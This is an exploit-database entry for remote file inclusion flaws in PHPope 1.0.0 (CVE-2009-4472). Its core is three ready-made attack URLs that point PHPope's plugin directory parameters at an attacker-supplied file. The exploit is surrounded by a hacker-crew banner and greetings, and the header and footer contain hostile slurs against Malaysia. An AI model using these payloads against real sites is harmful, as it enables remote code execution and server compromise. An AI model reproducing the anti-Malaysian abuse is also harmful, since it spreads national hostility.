PHPope 1.0.0 - Multiple Remote File Inclusions

Author: cr4wl3r
type: webapps
platform: php
port: 
date_added: 2009-09-02 
date_updated:  
verified: 1 
codes: OSVDB-61463;CVE-2009-4472;OSVDB-61462;OSVDB-61461 
tags: 
aliases:  
screenshot_url:  
application_url: 

######################################################################
#[x] PHPope <= 1.0.0 Multiple Remote File Include Vulnerability
#[!] Download Script      :  http://sourceforge.net/projects/phpope/files/
#[!] Author               :  cr4wl3r
#[!] Contact              :  cr4wl3r[4t]linuxmail[dot]org
#[!] Location             :  Gorontalo - INDONESIA
#[!] Dork                 :  "FuCk y0u MaLaYsia"
######################################################################

[x] 3xplo!t :

http://localhost/[path]/plugins/address/admin/index.php?GLOBALS[config][dir][plugins]=[AvriLhea]
http://localhost/[path]/plugins/im/compose.php?GLOBALS[config][dir][functions]=[AvriLhea]
http://localhost/[path]/plugins/cssedit/admin/index.php?GLOBALS[config][dir][classes]=[AvriLhea]


and many others

######################################################################
#[!] Greetz : MyMom [alm]
#
#[!] Special Thanks : str0ke, google, sourceforge, All MusLiM HacKers
#
#[!] Thanks 2 : xoron, opt!x hacker, irvian, cyberlog
#
#[!] AlfaNet Cr3w GoRonTaLo : FaHry PunKs, RhyA HaMim, BoBy C00l, UyaN, ArYa.TaMa
#
#[!] My BiG BozZ MinJo.B0rj0e (YanG PunYa SepaRuH KaMpuNg Bugis, JaNgan LuPa Am-Am) :D
#
#[!] FuCk MaLaYsia, I HaTe MaLaYsia, h0w Ab0uT y0u???
#
#[!] sekuritionline.net | manadocoding.net
######################################################################

# milw0rm.com [2009-09-03]